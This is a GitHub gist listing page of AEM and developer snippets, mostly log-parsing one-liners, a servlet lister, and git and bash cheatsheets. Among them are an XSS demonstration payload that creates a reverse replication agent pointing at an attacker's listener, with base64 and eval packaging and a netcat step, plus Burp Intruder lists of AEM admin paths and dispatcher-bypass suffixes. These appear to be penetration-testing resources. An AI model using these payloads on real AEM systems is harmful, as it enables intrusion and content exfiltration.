Thomas Hartmann thomashartm
thomashartm
/ registered-aem-servlets.groovy
Last active
November 1, 2019 12:41
Prints out a list of servlets which are registered as OSGi components. The purpose is to find servlets which are listening to fixed paths or the default resource type
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.osgi.service.cm.Configuration | |
| import org.osgi.service.component.runtime.ServiceComponentRuntime | |
| def scr = getService(ServiceComponentRuntime.class) | |
| def descs = scr.getComponentDescriptionDTOs() | |
| def i = 0 |
thomashartm
/ requests-from-access-log.sh
Last active
July 12, 2019 15:24
Pulls out requests in the format METHOD PATH STATUSCODE SIZE from AEM access.log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Use this script to pull out all requests in the format METHOD PATH STATUSCODE SIZE from AEM access.log | |
| # An entry will look as follows: | |
| # GET /content/we-retail.html 200 45673 | |
| cat access.log* | tr -d - | cut -d\" -f2,3 | sed 's/ HTTP\/1.1//' > issued-requests.txt |
thomashartm
/ create-reverse-replication-agent.js
Last active
July 3, 2019 13:30
Demonstration payload for persistent XSS in AEM to generate reverse replication agent that interacts with a fake AEM server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * The following snippet will call it's AEM backend and create a reverse replication agent communicating with | |
| * http://localhost:8888/reverseagent | |
| * Use base64 btoa and eval(atob(...)) to package it and unpackage and execute it | |
| * To demonstrate the aem system issuing the requests run: | |
| * netcat -nvlp 8888 to | |
| */ | |
| $.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {'jcr:primaryType':'cq:Page'}}); | |
| setTimeout(function(){ | |
| $.ajax({url: '/content/rce/portal-to-toom/_jcr_content',type: 'POST', data: {'jcr:primaryType': 'nt:unstructured','jcr:title': 'reverse-agent','enabled': 'true','transportUri': 'http://localhost:8888/reverseagent','transportUser': 'admin','reverseReplication': true,'cq:template': '/libs/cq/replication/templates/revagent','retryDelay': '5000','sling:resourceType': 'cq/replication/components/revagent','transportPassword': '{25a0084936aae0469c1e8464fe1d75a3bd36f65a9d2c40628239eb3c2cc04972}'}}); |
thomashartm
/ burp-intruder-aem-critical-paths.txt
Last active
August 9, 2021 06:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /admin | |
| /system/console | |
| /dav/crx.default | |
| /crx | |
| /bin/crxde/logs | |
| /jcr:system/jcr:versionStorage.json | |
| /_jcr_system/_jcr_versionStorage.json | |
| /libs/wcm/core/content/siteadmin.html | |
| /libs/collab/core/content/admin.html | |
| /libs/cq/ui/content/dumplibs.html |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| for i in $(grep '<version>' pom.xml); do | |
| version=${i%<*}; | |
| version=${version#*>}; | |
| if [[ $version == *"SNAPSHOT"* ]] | |
| then | |
| echo "$version"; | |
| fi | |
| done |
thomashartm
/ git-cheatsheet.txt
Last active
March 24, 2020 09:07
Git commonly used commands cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################## | |
| # fetches all branches and commits from remote in this case origin | |
| git fetch origin | |
| ######################## | |
| # show local branches | |
| git branch | |
| # shows alsp remote branches | |
| git branch -r |
thomashartm
/ burp-intruder-aem-dispatcher-bypass.txt
Last active
August 9, 2021 06:03
Burp Intruder payload lists for AEM content grabbing URL suffixes to bypass dispatcher rules. Just copy the list into your intruder options.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .json | |
| .1.json | |
| .json/a.css | |
| .json/a.html | |
| .json/a.ico | |
| .json/a.png | |
| .json/a.gif | |
| .json/a.1.json | |
| .json;%0aa.css | |
| .json;%0aa.html |
thomashartm
/ Search for param
Created
June 5, 2019 06:37
Searches for an IP in archived and gzipped log files and splits by whitespace and shows the first 3 elements
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| zgrep -e "127.0.0.1" archive/access.log* | grep ".html" | cut -d' ' -f1,3,2 |
thomashartm
/ maven_package_exec_fat_jar.txt
Created
June 1, 2019 18:27
Packaging an executable fat JAR with Apache Maven
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Three ways to create an executable and fat JAR with Maven : | |
| maven-jar-plugin (it doesn't add dependencies inside the final JAR, they have to be in the classpath) | |
| <plugin> | |
| <groupId>org.apache.maven.plugins</groupId> | |
| <artifactId>maven-jar-plugin</artifactId> | |
| <configuration> | |
| <archive> | |
| <manifest> |
thomashartm
/ bash-cheatsheet.sh
Created
May 21, 2019 20:37
— forked from LeCoupa/bash-cheatsheet.sh
Bash CheatSheet for UNIX Systems --> UPDATED VERSION --> https://github.com/LeCoupa/awesome-cheatsheets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##################################################### | |
| # Name: Bash CheatSheet for Mac OSX | |
| # | |
| # A little overlook of the Bash basics | |
| # | |
| # Usage: | |
| # | |
| # Author: J. Le Coupanec | |
| # Date: 2014/11/04 |